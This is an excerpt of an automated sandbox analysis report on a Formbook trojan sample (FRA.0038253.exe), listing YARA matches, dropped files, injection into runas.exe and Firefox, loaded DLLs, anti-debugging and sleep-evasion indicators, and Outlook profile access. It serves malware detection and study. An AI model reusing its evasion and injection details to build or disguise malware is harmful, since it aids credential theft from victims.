        Source: 00000005.00000002.7156734462.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.2959029682.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000006.00000002.7155964174.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.7156338070.0000000003A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.2986365523.0000000036400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/9@27/12
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_00404789 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404789
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_00402198 CoCreateInstance,MultiByteToWideChar,0_2_00402198
        Source: C:\Users\user\Desktop\FRA.0038253.exeFile created: C:\Program Files (x86)\Telepatisk.ini
        Source: C:\Users\user\Desktop\FRA.0038253.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars
        Source: C:\Users\user\Desktop\FRA.0038253.exeFile created: C:\Users\user\AppData\Local\Temp\nsx9EE9.tmp
        Source: FRA.0038253.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\FRA.0038253.exeFile read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\FRA.0038253.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\FRA.0038253.exeFile read: C:\Users\user\Desktop\FRA.0038253.exe
        Source: unknownProcess created: C:\Users\user\Desktop\FRA.0038253.exe "C:\Users\user\Desktop\FRA.0038253.exe"
        Source: C:\Users\user\Desktop\FRA.0038253.exeProcess created: C:\Users\user\Desktop\FRA.0038253.exe "C:\Users\user\Desktop\FRA.0038253.exe"
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
        Source: C:\Windows\SysWOW64\runas.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: credui.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeFile written: C:\Users\user\AppData\Local\Temp\Settings.iniJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: FRA.0038253.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: wntdll.pdbUGP source: FRA.0038253.exe, 00000003.00000003.2871696616.000000003550B000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2963043943.0000000004307000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: FRA.0038253.exe, FRA.0038253.exe, 00000003.00000003.2871696616.000000003550B000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2963043943.0000000004307000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: Yara matchFile source: 00000000.00000002.2678094371.0000000007F78000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_70751B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_70751B28
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356B97A1 push es; iretd 3_2_356B97A8
        Source: C:\Users\user\Desktop\FRA.0038253.exeFile created: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\FRA.0038253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35721763 rdtsc 3_2_35721763
        Source: C:\Windows\SysWOW64\runas.exeWindow / User API: threadDelayed 9593Jump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\FRA.0038253.exeAPI coverage: 0.3 %
        Source: C:\Windows\SysWOW64\runas.exe TID: 1848Thread sleep count: 120 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\runas.exe TID: 1848Thread sleep time: -240000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\runas.exe TID: 1848Thread sleep count: 9593 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\runas.exe TID: 1848Thread sleep time: -19186000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe TID: 6464Thread sleep time: -130000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe TID: 6464Thread sleep count: 40 > 30Jump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe TID: 6464Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe TID: 6464Thread sleep count: 74 > 30Jump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe TID: 6464Thread sleep time: -74000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A19
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_004065EA FindFirstFileA,FindClose,0_2_004065EA
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_004027CF FindFirstFileA,0_2_004027CF
        Source: FRA.0038253.exe, 00000003.00000003.2938213391.0000000005315000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
        Source: FRA.0038253.exe, 00000003.00000003.2868616234.0000000005355000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\FRA.0038253.exeAPI call chain: ExitProcess graph end nodegraph_0-4371
        Source: C:\Users\user\Desktop\FRA.0038253.exeAPI call chain: ExitProcess graph end nodegraph_0-4535
        Source: C:\Windows\SysWOW64\runas.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35721763 rdtsc 3_2_35721763
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357234E0 NtCreateMutant,LdrInitializeThunk,3_2_357234E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_70751B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_70751B28
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35769567 mov eax, dword ptr fs:[00000030h]3_2_35769567
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579B56E mov eax, dword ptr fs:[00000030h]3_2_3579B56E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579B56E mov ecx, dword ptr fs:[00000030h]3_2_3579B56E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357BB55F mov eax, dword ptr fs:[00000030h]3_2_357BB55F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571F523 mov eax, dword ptr fs:[00000030h]3_2_3571F523
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D753F mov eax, dword ptr fs:[00000030h]3_2_356D753F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35711527 mov eax, dword ptr fs:[00000030h]3_2_35711527
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E3536 mov eax, dword ptr fs:[00000030h]3_2_356E3536
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F51B mov eax, dword ptr fs:[00000030h]3_2_3578F51B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F51B mov ecx, dword ptr fs:[00000030h]3_2_3578F51B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35701514 mov eax, dword ptr fs:[00000030h]3_2_35701514
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB502 mov eax, dword ptr fs:[00000030h]3_2_356DB502
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579550D mov eax, dword ptr fs:[00000030h]3_2_3579550D
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EB5E0 mov eax, dword ptr fs:[00000030h]3_2_356EB5E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357655E0 mov eax, dword ptr fs:[00000030h]3_2_357655E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357115EF mov eax, dword ptr fs:[00000030h]3_2_357115EF
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576B5D3 mov eax, dword ptr fs:[00000030h]3_2_3576B5D3
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF5C7 mov eax, dword ptr fs:[00000030h]3_2_356DF5C7
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35787591 mov edi, dword ptr fs:[00000030h]3_2_35787591
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35719580 mov eax, dword ptr fs:[00000030h]3_2_35719580
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F582 mov eax, dword ptr fs:[00000030h]3_2_3579F582
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F478 mov eax, dword ptr fs:[00000030h]3_2_3579F478
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571D450 mov eax, dword ptr fs:[00000030h]3_2_3571D450
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356ED454 mov eax, dword ptr fs:[00000030h]3_2_356ED454
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579D430 mov eax, dword ptr fs:[00000030h]3_2_3579D430
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB420 mov eax, dword ptr fs:[00000030h]3_2_356DB420
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35717425 mov eax, dword ptr fs:[00000030h]3_2_35717425
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35717425 mov ecx, dword ptr fs:[00000030h]3_2_35717425
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577B420 mov eax, dword ptr fs:[00000030h]3_2_3577B420
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576F42F mov eax, dword ptr fs:[00000030h]3_2_3576F42F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35769429 mov eax, dword ptr fs:[00000030h]3_2_35769429
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F409 mov eax, dword ptr fs:[00000030h]3_2_3579F409
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F4FD mov eax, dword ptr fs:[00000030h]3_2_3579F4FD
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357094FA mov eax, dword ptr fs:[00000030h]3_2_357094FA
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357154E0 mov eax, dword ptr fs:[00000030h]3_2_357154E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570F4D0 mov eax, dword ptr fs:[00000030h]3_2_3570F4D0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357014C9 mov eax, dword ptr fs:[00000030h]3_2_357014C9
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357954B0 mov eax, dword ptr fs:[00000030h]3_2_357954B0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357954B0 mov ecx, dword ptr fs:[00000030h]3_2_357954B0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576D4A0 mov ecx, dword ptr fs:[00000030h]3_2_3576D4A0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576D4A0 mov eax, dword ptr fs:[00000030h]3_2_3576D4A0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571B490 mov eax, dword ptr fs:[00000030h]3_2_3571B490
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35785490 mov eax, dword ptr fs:[00000030h]3_2_35785490
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35721763 mov eax, dword ptr fs:[00000030h]3_2_35721763
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35713740 mov eax, dword ptr fs:[00000030h]3_2_35713740
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF75B mov eax, dword ptr fs:[00000030h]3_2_356DF75B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571174A mov eax, dword ptr fs:[00000030h]3_2_3571174A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576174B mov eax, dword ptr fs:[00000030h]3_2_3576174B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576174B mov ecx, dword ptr fs:[00000030h]3_2_3576174B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35709723 mov eax, dword ptr fs:[00000030h]3_2_35709723
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB705 mov eax, dword ptr fs:[00000030h]3_2_356DB705
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB705 mov eax, dword ptr fs:[00000030h]3_2_356DB705
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB705 mov eax, dword ptr fs:[00000030h]3_2_356DB705
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB705 mov eax, dword ptr fs:[00000030h]3_2_356DB705
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356ED700 mov ecx, dword ptr fs:[00000030h]3_2_356ED700
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F717 mov eax, dword ptr fs:[00000030h]3_2_3579F717
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A970B mov eax, dword ptr fs:[00000030h]3_2_357A970B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A970B mov eax, dword ptr fs:[00000030h]3_2_357A970B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E37E4 mov eax, dword ptr fs:[00000030h]3_2_356E37E4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E37E4 mov eax, dword ptr fs:[00000030h]3_2_356E37E4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E37E4 mov eax, dword ptr fs:[00000030h]3_2_356E37E4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E37E4 mov eax, dword ptr fs:[00000030h]3_2_356E37E4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E37E4 mov eax, dword ptr fs:[00000030h]3_2_356E37E4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E37E4 mov eax, dword ptr fs:[00000030h]3_2_356E37E4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E37E4 mov eax, dword ptr fs:[00000030h]3_2_356E37E4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E77F9 mov eax, dword ptr fs:[00000030h]3_2_356E77F9
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E77F9 mov eax, dword ptr fs:[00000030h]3_2_356E77F9
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F7CF mov eax, dword ptr fs:[00000030h]3_2_3579F7CF
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357B17BC mov eax, dword ptr fs:[00000030h]3_2_357B17BC
